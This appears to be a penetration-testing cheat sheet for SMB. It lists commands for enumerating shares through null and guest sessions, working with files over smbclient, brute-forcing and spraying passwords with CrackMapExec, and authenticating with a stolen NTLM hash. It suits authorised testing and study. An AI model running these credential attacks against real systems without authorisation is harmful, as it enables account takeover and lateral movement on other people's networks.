List Shares (Unauthenticated)
There are many different tools used to list SMB shares.
smbmap
smbmap -H 10.129.14.128
smbclient
smbclient -N -L //10.129.14.128
List Shares (Authenticated)
There are many different tools used to list SMB shares.
smbmap
smbmap -H 10.129.14.128 -u shelled
smbclient
smbclient -L //10.129.14.128 -U shelled
Connect to Share
There are many different tools used to connect to an SMB share.
smbclient
smbclient //10.129.14.128 -U shelled
SMB Commands
Here are a few commands to use when connected to a share using smbclient.
List files on share
ls
Go into a Folder
cd <folder>
Create a folder
mkdir <folder>
Download a file
get <file>
Upload a file
put <local_filename> <remote_filename>
Rename a file
rename <remote_filename> <new_remote_filename>
Local Commands
SMB allows you to execute local system commands
!<cmd>
Example
!cat creds.txt
Null Authentication
SMB can be configured not to require authentication, which is often called a `null session`. We can login to SMB without a username or password by doing the following:
smbclient
smbclient -N -L //{IP}
smbmap
smbmap -H {IP}
rpcclient
rpcclient -U "" -N {IP}
enum4linux
enum4linux -a {IP}
Guest Account
The SMB guest account is designed to provide public access to certain resources without requiring users to log in with individual credentials. This can be useful for scenarios where read-only access is required for specific folders or files, such as providing public access to shared documents or media files.
smbclient
smbclient -L //{IP} -U guest
smbmap
smbmap -H {IP} -u guest -p ''
rpcclient
rpcclient -U "guest" -N {IP}
enum4linux
enum4linux -a {IP} -u 'guest' -p ''
Password Bruteforce
We can bruteforce passwords using CrackMapExec (CME).
crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt
crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt --local-auth
Password Spray
We can password spray using CrackMapExec (CME).
crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!'
crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!' --local-auth
Pass the Hash
If we manage to get an NTLM hash of a user, and if we cannot crack it, we can still use the hash to authenticate over SMB with a technique called Pass-the-Hash (PtH). When users log in to a Windows-based system, their passwords are not stored in plaintext. Instead, the system stores a one-way mathematical representation of the password called a hash. The hash is generated from the user's password using a hashing algorithm. This hash is what is used to validate the user's credentials when they attempt to log in.
In a Pass-the-Hash attack, an attacker captures the hashed password of a valid user from a compromised system or network. Instead of attempting to crack the hash and retrieve the plaintext password, the attacker simply reuses the captured hash directly to authenticate themselves on other systems without needing to know the original password.
crackmapexec smb {IP} -u Administrator -H {HASH}